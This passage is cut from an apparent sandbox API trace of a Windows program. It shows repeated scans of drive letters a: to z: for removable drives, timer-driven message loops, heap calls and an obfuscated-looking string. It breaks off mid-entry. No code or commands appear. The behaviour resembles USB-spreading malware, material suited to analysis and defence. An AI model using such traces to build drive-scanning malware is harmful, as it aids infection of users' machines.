GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.690] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.690] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.690] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.690] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.691] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.691] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.691] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.691] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.691] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.691] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.691] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.692] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.692] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.692] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.692] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.692] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.692] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0219.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.694] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.694] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.694] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.694] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0219.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0219.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.695] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.695] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.695] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.695] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.695] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.695] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.696] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0219.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.696] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.696] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.696] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.696] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.696] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.696] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.697] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.697] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.697] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.697] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.697] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.697] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.698] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.698] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.698] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.698] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.698] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.698] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.699] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.699] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.699] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.699] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.699] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.699] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.759] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.759] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.759] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0219.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.760] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.760] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.760] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.760] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.761] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.761] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0219.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0219.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0219.761] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0219.762] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.762] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.762] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.762] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0219.762] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0219.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.763] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.763] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.763] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.763] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.763] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.763] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.763] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.764] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.764] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.764] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.764] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.764] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.764] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.765] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.765] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.765] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.765] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.765] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.765] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.766] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.766] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.766] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.766] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.766] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.767] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.767] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.767] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0219.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.769] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.769] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.770] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0219.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.770] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.770] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.770] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.770] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.771] RtlAllocateHeap (HeapHandle=0x12c0000, 